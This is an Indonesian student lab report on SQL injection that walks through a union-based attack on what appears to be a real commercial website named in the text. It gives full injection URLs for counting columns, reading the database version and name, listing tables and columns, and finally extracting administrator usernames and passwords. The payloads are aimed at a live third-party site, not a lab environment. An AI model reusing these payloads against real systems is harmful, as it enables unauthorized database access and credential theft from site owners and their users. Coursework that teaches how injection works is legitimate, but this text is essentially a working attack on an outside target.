You are on page 1of 6

LAPORAN PRAKTIKUM SQL INJECTION

Keamanan Sistem Komputer

Disusun Oleh:
Nama : Ayu Sundara

NPM : 1061907

Kelas : 3 TRPL

Dosen : Sidhiq Andriyanto, M.Kom.

Mata Kuliah : Keamanan Sistem Komputer

25 JUNI 2022
POLITEKNIK MANUFAKTUR NEGERI BANGKA BELITUNG
Kawasan Industri Air Kantung, Sungailiat, Bangka, 33211
Langkah – langkah SQL injection
1. Mencari target

Dalam mencari target usahakan terdapat “=” yang menandakan terdapat database.

2. Tambahkan tanda ‘

Apakah terjadi SQL error seperti gambar diatas, berarti bisa dilanjutkan

3. Mencari jumlah kolom pada website

Cari jumlah kolom dengan perintah “order by’ mulai dari ke satu hingga batas. Disini
sebagai contoh untuk kolom hanya sampai 39 karena 40 sudah error.
4. Mencari kolom yang memiliki kelemahan

https://bradfordshoes.com/product.php?cat_id=-5 union select


1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,
31,32,33,34,35,36,37,38,39 –
Tambahkan “-“ pada setelah id dan tuliskan kolum 1 hingga 39 untuk menemukan kolom
yang terdapat kelemahan

Dapat dilihat bahwa muncul kolom yang memiliki kelemahan yaitu kolom 4.

5. Cek versi SQL dengan menambahkan @@version

https://bradfordshoes.com/product.php?cat_id=-5 union select


1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2
7,28,29,30,31,32,33,34,35,36,37,38,39 –
Tambahkan @@version pada kolom yang memiliki kelemahan
Terdapat versi SQL yang muncul

6. Mencari nama database

https://bradfordshoes.com/product.php?cat_id=-5 union select


1,2,3,concat(database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+information_schema.schemat
a–
Ganti dengan concat(database()) di kolom 4 dan +from+information_schema.schemata –
di akhir url

Nama nama database bradford_db


7. Mencari nama table pada database

https://bradfordshoes.com/product.php?cat_id=-5 union select


1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+information_schema.
tables+where+table_schema=database() –
Ganti dengan group_concat(table_name) pada kolom 4 dan
+from+information_schema.tables+where+table_schema=database() – pada akhir url

Muncul daftar table yang berada pada database bradford. Disini kita menggunakan table
tbl_administrators

8. Mencari entitas yang terdapat pada tbl_administrators

https://bradfordshoes.com/product.php?cat_id=-5 union select


1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+information_sche
ma.columns+where+table_name=0x74626C5F61646D696E6973747261746F727
3–
Ganti dengan group_concat(column_name) pada kolom 4 dan
+from+information_schema.columns+where+table_name=0x74626C5F61646D696E697
3747261746F7273 – pada akhir URL
Ubah dulu tbl_administrators menjadi Hex untuk ditempatkan pada akhir URL. Disini
menjadi 74626C5F61646D696E6973747261746F7273.
Sudah muncul entitas yang ada pada table.

9. Mengambil isi dari entitas

https://bradfordshoes.com/product.php?cat_id=-5 union select


1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,
1
8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+bradfo
r
d_db.tbl_administrators –
Ganti dengan group_concat(username,0x3a,password) untuk mengambil
username dan password dan +from+bradford_db.tbl_administrators – pada
akhir URL untuk dari table dan database mana diambil.

You might also like